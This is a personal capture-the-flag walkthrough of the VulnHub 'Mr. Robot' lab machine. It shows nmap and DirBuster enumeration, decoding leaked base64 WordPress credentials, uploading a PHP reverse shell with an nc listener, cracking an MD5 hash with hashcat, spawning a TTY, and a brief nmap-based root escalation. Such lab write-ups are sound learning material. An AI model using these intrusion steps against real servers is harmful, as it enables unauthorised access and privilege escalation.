Mr. Robot is a Linux-based vulnerable machine available on VulnHub.com. According to the author, the machine has three hidden flags which get progressively harder to find. Mr. Robot is considered beginner/intermediate level, and doesn’t require any advanced exploitation techniques to conquer.
The Mr. Robot VM is running on a host-only adapter/network of 192.168.110.0/24. The machine is set up to pull an IP from DHCP when it boots. I know the DHCP range on this subnet is .200-.254, so I start with a simple nmap scan to discover the machine:
nmap -vv 192.168.110.200-254
Scanning 192.168.110.201 [1000 ports] Discovered open port 443/tcp on 192.168.110.201 Discovered open port 80/tcp on 192.168.110.201 Completed SYN Stealth Scan at 02:10, 4.97s elapsed (1000 total ports) Nmap scan report for 192.168.110.201 Host is up, received arp-response (0.00077s latency). Scanned at 2016-08-30 02:10:30 CDT for 6s Not shown: 997 filtered ports Reason: 997 no-responses PORT STATE SERVICE REASON 22/tcp closed ssh reset ttl 64 80/tcp open http syn-ack ttl 64 443/tcp open https syn-ack ttl 64
Right away, we see the IP address of the machine is 192.168.110.201 and that ports 80 and 443 are open. Navigating to 192.168.110.201 in the browser, we find the interactive Mr. Robot website from the TV show, but nothing of real interest.
Now we’ll run DirBuster to try and enumerate the files/folders on the web-server:
And get a big list of results to look through:
---- Scanning URL: http://192.168.110.201/ ==> DIRECTORY: http://192.168.110.201/0/ ==> DIRECTORY: http://192.168.110.201/admin/ + http://192.168.110.201/atom (CODE:301|SIZE:0) ==> DIRECTORY: http://192.168.110.201/audio/ ==> DIRECTORY: http://192.168.110.201/blog/ ==> DIRECTORY: http://192.168.110.201/css/ + http://192.168.110.201/dashboard (CODE:302|SIZE:0) + http://192.168.110.201/favicon.ico (CODE:200|SIZE:0) ==> DIRECTORY: http://192.168.110.201/feed/ ==> DIRECTORY: http://192.168.110.201/image/ ==> DIRECTORY: http://192.168.110.201/Image/ ==> DIRECTORY: http://192.168.110.201/images/ + http://192.168.110.201/index.html (CODE:200|SIZE:1077) + http://192.168.110.201/index.php (CODE:301|SIZE:0) + http://192.168.110.201/intro (CODE:200|SIZE:516314) ==> DIRECTORY: http://192.168.110.201/js/ + http://192.168.110.201/license (CODE:200|SIZE:309) + http://192.168.110.201/login (CODE:302|SIZE:0) + http://192.168.110.201/page1 (CODE:301|SIZE:0) + http://192.168.110.201/phpmyadmin (CODE:403|SIZE:94) + http://192.168.110.201/rdf (CODE:301|SIZE:0) + http://192.168.110.201/readme (CODE:200|SIZE:64) + http://192.168.110.201/robots (CODE:200|SIZE:41) + http://192.168.110.201/robots.txt (CODE:200|SIZE:41) + http://192.168.110.201/rss (CODE:301|SIZE:0) + http://192.168.110.201/rss2 (CODE:301|SIZE:0) + http://192.168.110.201/sitemap (CODE:200|SIZE:0) + http://192.168.110.201/sitemap.xml (CODE:200|SIZE:0) ==> DIRECTORY: http://192.168.110.201/video/ ==> DIRECTORY: http://192.168.110.201/wp-admin/ + http://192.168.110.201/wp-config (CODE:200|SIZE:0) ==> DIRECTORY: http://192.168.110.201/wp-content/ + http://192.168.110.201/wp-cron (CODE:200|SIZE:0) ==> DIRECTORY: http://192.168.110.201/wp-includes/ + http://192.168.110.201/wp-links-opml (CODE:200|SIZE:227) + http://192.168.110.201/wp-load (CODE:200|SIZE:0) + http://192.168.110.201/wp-login (CODE:200|SIZE:2685) + http://192.168.110.201/wp-mail (CODE:500|SIZE:3064) + http://192.168.110.201/wp-settings (CODE:500|SIZE:0) + http://192.168.110.201/wp-signup (CODE:302|SIZE:0) + http://192.168.110.201/xmlrpc (CODE:405|SIZE:42) + http://192.168.110.201/xmlrpc.php (CODE:405|SIZE:42)
We see that WordPress is installed. But before messing with that, it’s crucial that we go through every other file/folder and look for useful information. The first interesting file we find is 192.168.110.201/license. NOTE: At first glance, this page just has one line of text taunting us. Make sure you look at the ENTIRE THING!
what you do just pull code from Rapid9 or some s@#% since when did you become a script kitty? ~~snip~~ do you want a password or something? ~~snip~~ ZWxsaW90OkVSMjgtMDY1Mgo=
At the very bottom of the file/page, we find what looks to be a base-64 encoded string. Let’s try decoding it in the terminal:
echo ZWxsaW90OkVSMjgtMDY1Mgo= | base64 -d elliot:ER28-0652
Looks like we’ve found some credentials. Maybe they’re for WordPress? We’ll save these and finish up with our enumeration and looting of the web-server’s files and folders.
FIRST FLAG FOUND
After continuing to look through the files and directories found by DirBuster, we make our way into the robots.txt file. In there, we find two very interesting files:
User-agent: * fsocity.dic key-1-of-3.txt
The fsocity.dic file appears to be a wordlist that we’ll hang on to just in case we need it later. When we navigate to http://192.168.110.201/key-1-of-3.txt, we find the first of three flags:
WORDPRESS & GETTING A SHELL
With the first flag captured and the enumeration/looting of the webserver’s public files/directories complete, it’s time to take a look at the WordPress install. Using the elliot:ER28-0652 credentials we found earlier, we’re able to log into WordPress. It becomes immediately apparent that elliot is the administrator account:
Now that we have access to the WordPress administrator account, we should be able to set up a reverse-shell back to a listener on our attack machine. I used a php reverse-shell from PentestMonkey and uploaded it to the server through WordPress’ built-in plugin installer. However, in hindsight, I also could have used WordPress’ built-in file editor to insert some malicious PHP into one of the many WordPress .php files.
Before executing the code on the server, let’s first set up a listener on our attack machine:
nc -lvp 666 //Note:Make sure you set this to whatever port your shell is trying to connect back to. I used 666 in this example.
With a listener running, we can now use the browser to navigate to the location of our shell code(http://192.168.110.201/wp-content/uploads/2016/08/shell.php) and hopefully get a shell on our attack machine:
With a shell established, let’s begin looking around. I tend to start in the home directory and in this instance we find a folder for a user named “robot”. Let’s cd into that folder and take a look if we can:
$cd /home/robot/ $ ls -asl total 16 4 drwxr-xr-x 2 root root 4096 Nov 13 2015 . 4 drwxr-xr-x 3 root root 4096 Nov 13 2015 .. 4 -r-------- 1 robot robot 33 Nov 13 2015 key-2-of-3.txt 4 -rw-r--r-- 1 robot robot 39 Nov 13 2015 password.raw-md5
We find the 2nd key file, however we can’t read it due to the permissions. However, there is a file named password.raw-md5 that we can read:
$ cat password.raw-md5 robot:c3fcd3d76192e4007dfb496cca67e13b
It looks to be the login and password hash for the user “robot”. Let’s place that hash in a text file on our attacker machine named hashes, and then use HashCat and the rockyou.txt wordlist to try and crack it:
hashcat -a 0 -m 0 hashes rockyou.txt Initializing hashcat v2.00 with 2 threads and 32mb segment-size... Added hashes from file hashes: 1 (1 salts) Activating quick-digest mode for single-hash c3fcd3d76192e4007dfb496cca67e13b:abcdefghijklmnopqrstuvwxyz All hashes have been recovered Input.Mode: Dict (rockyou.txt) Index.....: 1/5 (segment), 3627099 (words), 33550343 (bytes) Recovered.: 1/1 hashes, 1/1 salts Speed/sec.: - plains, 2.77M words Progress..: 1853946/3627099 (51.11%) Running...: 00:00:00:01 Estimated.: --:--:--:--
So the password for user “robot” is abcdefghijklmnopqrstuvwxyz.
GETTING FLAG #2
When attempting to login as “robot” by using ‘su – robot’, I kept getting an error saying I could only execute this command from a terminal. I managed to get around this by borrowing the following command from g0tmi1k’s Basic Linux Privilege Escalation page:
python -c 'import pty;pty.spawn("/bin/bash")'
Which then allowed me to login as robot:
daemon@linux:/$ su - robot Password: abcdefghijklmnopqrstuvwxyz $ whoami robot
Now that we’re logged in as robot, we can finally read the 2nd flag file:
$ cat /home/robot/key-2-of-3.txt 822c73956184f694993bede3eb39f959
GETTING ROOT & FLAG #3
Escalating privileges to root on Mr. Robot was definitely challenging for me. After doing all sorts of enumeration and searching for exploits on exploit-db/etc, I was stuck. I finally asked a friend who had recently completed Mr. Robot for help. He told me that nmap was installed on the VM, and that I should look into that. After some Google searching, I learned that nmap’s interactive mode could be used to escalate privileges in certain scenarios.
From there, it was smooth sailing and I managed to quickly get root privileges and read the third and final flag file:
This was a fun machine overall and taught me a few things:
First: How easily an Admin account on WordPress can be leveraged to get a shell on a server.
Second: How important enumeration is to privilege escalation. Even though I thought I had looked at everything, I had missed a relatively simple escalation vulnerability.
Enumerate, enumerate, enumerate…And then Google everything you find.